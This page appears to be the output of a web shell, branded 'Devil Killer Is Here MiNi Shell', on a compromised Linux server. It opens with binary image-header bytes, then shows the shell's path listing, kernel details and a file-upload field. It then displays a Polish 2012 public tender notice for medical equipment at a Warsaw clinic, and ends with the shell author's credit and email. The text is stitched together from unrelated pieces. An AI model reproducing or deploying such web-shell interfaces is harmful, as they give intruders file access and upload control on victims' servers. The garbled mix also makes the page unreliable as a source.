JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121022/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121022/410530-N-2012.html

<p class="kh_header"><b>Warszawa: Dostawa do siedziby Przychodni Lekarskiej WAT SP ZOZ sprzętu medycznego, 6 zadań</b><br>
<b>Numer ogłoszenia: 410530 - 2012; data zamieszczenia: 22.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przychodnia Lekarska Wojskowej Akademii Technicznej Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Kartezjusza 2, 01-480 Warszawa, woj. mazowieckie, tel. 022 6838281, 6838283, faks 022 6838224.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.plwat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa do siedziby Przychodni Lekarskiej WAT SP ZOZ sprzętu medycznego, 6 zadań.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia został podzielony na 6 zadań, które obejmują: 
1) Zadanie 1: 1 perymetr komputerowy (zestaw do badań perymetrycznych); 
2) Zadanie 2: 1 lancetron (aparat elektrochirurgiczny);
3) Zadanie 3: 1 fotel ginekologiczny;
4) Zadanie 4: 1 aparat do pomiaru ciśnienia zegarowy na statywie;
5) Zadanie 5: 3 ciśnieniomierze lekarskie zegarowe;
6) Zadanie 6: 3 piłeczki do ćwiczeń i rehabilitacji palców dłoni (miękka, średnia i mocna)
Zamawiany sprzęt medyczny (w zakresie każdego pakietu odrębnie) powinien być wyprodukowany w 2012 r. przez jednego producenta, fabrycznie nowy. Dokładniejszy opis przedmiotów zamówienia, zawierający wymagania Zamawiającego, w zakresie parametrów technicznych i użytkowych oraz warunków gwarancji, traktowanych jako graniczne, zawarty jest w załączniku Nr 1 do SIWZ, w tabelach zgodnych z numeracją zadań (1-6).  
Wykonawca na swój koszt i ryzyko, zapewni opakowanie, transport, przeprowadzi instalację, montaż i uruchomienie dostarczonego sprzętu (zadania 1-3).
Wykonawca zobowiązuje się do przeszkolenia w siedzibie Zamawiającego personelu medycznego zatrudnionego u Zamawiającego w wymiarze gwarantującym sprawną obsługę i pełne wykorzystanie możliwości sprzętu (zadania 1-3).
Wykonawca zapewni gwarancję i reakcję serwisu gwarancyjnego i pogwarancyjnego wg podanych przez siebie terminach (zadania 1-5). 
Oferta na zadania 1-3 stanowi Załącznik Nr 2 do SIWZ, oferta na zadania 4-6  sta-nowi Załącznik Nr 3 do SIWZ.
Łącznie z ofertą, Oferent zobowiązany jest do złożenia dokumentów w języku pol-skim w wymaganej formie pisemnej zgodnie z wykazem dla każdego pakietu, po-danym w rozdziale IX SIWZ.
Dla dostawy sprzętu medycznego  opracowano 2  projekty umów, dla zadań 1-3  w Zał. Nr 7, dla zadań 4-6 w Zał. Nr 8..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0, 33.12.20.00-1, 33.19.70.00-7, 33.16.10.00-6, 33.19.23.00-5, 33.12.30.00-8, 33.15.50.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Dla zadań 1, 2, 3	Zamawiający wymaga wniesienia wadium w wysokości: 
dla zadania 1:  900,00 zł
dla zadania 2:  300,00 zł
dla zadania 3:  120,00 zł
Jeżeli Oferent składa ofertę na więcej niż jedno zadanie, wnosi wadium, które jest sumą wymaganych wadiów dla wybranych zadań.
Brak potwierdzenia wniesienia wadium, będzie skutkował wykluczeniem Wykonawcy (art. 24 ust. 2, p. 2 ustawy Pzp).
Wadium wnosi się przed upływem terminu składania ofert.
Wadium może być wnoszone w jednej lub kilku następujących formach:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsię-biorczości (Dz. U.  z 2007 r. Nr 42, poz. 275 z późn. zm.).
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego tj. : PKO SA 35 1240 2034 1111 0000 0307 9487
Wadium uważa się za wniesione skutecznie wówczas, gdy przed upływem terminu do złożenia ofert nastąpi uznanie na rachunku Zamawiającego (jeżeli wadium wniesiono w pieniądzu), a dowód wniesienia wadium zostanie włożony do koperty z ofertą i dokumentami.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp według wzoru Zał. Nr 4</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku posiadania przez Wykonawcę niezbędnej wiedzy i do-świadczenia w zakresie przedmiotu zamówienia, wymienionego w zadaniach 1-5,   Zamawiający wymaga następujących dokumentów:
Wykazu wykonania min. 3 dostaw sprzętu medycznego o tożsamym  przezna-czeniu w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krót-szy - w tym okresie, którego minimalna wartość wynosi co najmniej 90% ceny jed-nostkowej brutto oferowanego sprzętu każda, wraz z co najmniej 3 referencjami (wg wzoru Zał. Nr 6 dla zadań 1-5); (składany dla każdego zadania odrębnie).
Jeżeli Wykonawca, polega na wiedzy i doświadczeniu innych podmiotów, niezależ-nie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest do złożenia pisemnego zobowiązania się tych podmiotów do faktycznego udziału w realizacji  zamówienia w charakterze podwykonawców w okresie obowiązywania umowy (art. 26 ust. 2 b ustawy Pzp).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp według wzoru Zał. Nr 4</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp według wzoru Zał. Nr 4</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp według wzoru Zał. Nr 4</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Zamawiający wymaga od Wykonawcy oferowanego sprzętu medycznego w zakresie zadań 1-5 następujących dokumentów w języku polskim: 
1. Deklaracja zgodności WE dla wyrobu medycznego oznakowanego znakiem  CE; 
2. Oświadczenie o posiadaniu dokumentu zgłoszenia, do rejestru Prezesa Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych wyrobu medycznego, oznaczonego znakiem zgodności CE, dla którego wystawiono deklarację zgodności, przed pierwszym wprowadzeniem do obrotu (do wglądu na każde życzenie Zamawiającego) (oświadczenie, składane z Zał. Nr 1 dla oferowa-nego wyrobu); 
3. W zakresie dostaw części zamiennych oraz serwisu gwarancyjnego i pogwarancyjnego, wykonawca zobowiązany jest podać listę upoważnionych podmiotów przez wytwórcę lub autoryzowanego przedstawiciela do wykonywania dostaw części zamiennych lub czynności zapewniających bezpieczną i bezawaryjną pracę oferowanego wyrobu medycznego (oświadczenie, składane z Zał. Nr 1 dla oferowanego wyrobu); 
4.  Dokumentacji technicznej lub materiałów informacyjnych, zawierających pełne dane techniczne i parametry użytkowe, potwierdzające spełnienie wymagań Za-mawiającego odnośnie parametrów granicznych, 
5. Inne wymagane dokumenty to: Instrukcja obsługi sprzętu i instrukcja serwisowa w języku polskim.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.plwat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PRZYCHODNIA LEKARSKA WOJSKOWEJ AKADEMII TECHNICZNEJ SAMODZIELNY PUBLICZNY ZAKŁAD OPIEKI ZDROWOTNEJ ul. Kartezjusza 2, pok. 411, 
01 - 480 Warszawa..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.11.2012 godzina 08:00, miejsce: PRZYCHODNIA LEKARSKA WOJSKOWEJ AKADEMII TECHNICZNEJ SAMODZIELNY PUBLICZNY ZAKŁAD OPIEKI ZDROWOTNEJ ul. Kartezjusza 2, pok. 411 lub Kancelaria pok. 109, 01 - 480 Warszawa..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1
1 perymetr komputerowy (zestaw do badań perymetrycznych).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Skład zamawianego zestawu do badań perymetrycznych:
Perymetr z wbudowanym komputerem PC;
Stolik z elektryczną regulacją wysokości blatu umieszczoną na korpusie kolumny;
Monitor dotykowy LCD o przekątnej 22 cale;
Zamawiany sprzęt medyczny (w zakresie każdego zadania odrębnie) powinien być wyprodukowany w 2012 r. przez jednego producenta, fabrycznie nowy. Dokładniejszy opis przedmiotów zamówienia, zawierający wymagania Zamawiającego, w zakresie parametrów technicznych i użytkowych oraz warunków gwarancji, traktowanych jako graniczne, zawarty jest w załączniku Nr 1 do SIWZ, w tabelach zgodnych z numeracją zadań (1-6).  
Uchwyt nabiurkowy na monitor LCD ze sprężyną gazową;
Kolorowa drukarka atramentowa zainstalowana na półce mieszczącej się pod blatem stolika.
33.12.20.00-1 - sprzęt oftalmologiczny;
33.19.70.00-7 - medyczne urządzenie komputerowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.20.00-1, 33.19.70.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2:
1 lancetron (aparat elektrochirurgiczny).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 lancetron (aparat elektrochirurgiczny)
Zamawiany sprzęt medyczny (w zakresie każdego zadania odrębnie) powinien być wyprodukowany w 2012 r. przez jednego producenta, fabrycznie nowy. Dokładniejszy opis przedmiotów zamówienia, zawierający wymagania Zamawiającego, w zakresie parametrów technicznych i użytkowych oraz warunków gwarancji, traktowanych jako graniczne, zawarty jest w załączniku Nr 1 do SIWZ, w tabelach zgodnych z numeracją zadań (1-6).  
33.16.10.00-6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3:
1 fotel ginekologiczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 fotel ginekologiczny.
Zamawiany sprzęt medyczny (w zakresie każdego zadania odrębnie) powinien być wyprodukowany w 2012 r. przez jednego producenta, fabrycznie nowy. Dokładniejszy opis przedmiotów zamówienia, zawierający wymagania Zamawiającego, w zakresie parametrów technicznych i użytkowych oraz warunków gwarancji, traktowanych jako graniczne, zawarty jest w załączniku Nr 1 do SIWZ, w tabelach zgodnych z numeracją zadań (1-6)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.23.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4:
1 aparat do pomiaru ciśnienia zegarowy na statywie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 aparat do pomiaru ciśnienia zegarowy na statywie.
 Zamawiany sprzęt medyczny (w zakresie każdego zadania odrębnie) powinien być wyprodukowany w 2012 r. przez jednego producenta, fabrycznie nowy. Dokładniejszy opis przedmiotów zamówienia, zawierający wymagania Zamawiającego, w zakresie parametrów technicznych i użytkowych oraz warunków gwarancji, traktowanych jako graniczne, zawarty jest w załączniku Nr 1 do SIWZ, w tabelach zgodnych z numeracją zadań (1-6)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.30.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie Nr 5:
3 ciśnieniomierze lekarskie zegarowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3 ciśnieniomierze lekarskie zegarowe.
Zamawiany sprzęt medyczny (w zakresie każdego zadania odrębnie) powinien być wyprodukowany w 2012 r. przez jednego producenta, fabrycznie nowy. Dokładniejszy opis przedmiotów zamówienia, zawierający wymagania Zamawiającego, w zakresie parametrów technicznych i użytkowych oraz warunków gwarancji, traktowanych jako graniczne, zawarty jest w załączniku Nr 1 do SIWZ, w tabelach zgodnych z numeracją zadań (1-6)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.30.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie 6:
3 piłeczki do ćwiczeń i rehabilitacji palców dłoni (miękka, średnia, mocna)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3 piłeczki do ćwiczeń i rehabilitacji palców dłoni (miękka, średnia, mocna). 
2.	 Zamawiany sprzęt medyczny (w zakresie każdego zadania odrębnie) powinien być wyprodukowany w 2012 r. przez jednego producenta, fabrycznie nowy. Dokładniejszy opis przedmiotów zamówienia, zawierający wymagania Zamawiającego, w zakresie parametrów technicznych i użytkowych oraz warunków gwarancji, traktowanych jako graniczne, zawarty jest w załączniku Nr 1 do SIWZ, w tabelach zgodnych z numeracją zadań (1-6)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.50.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com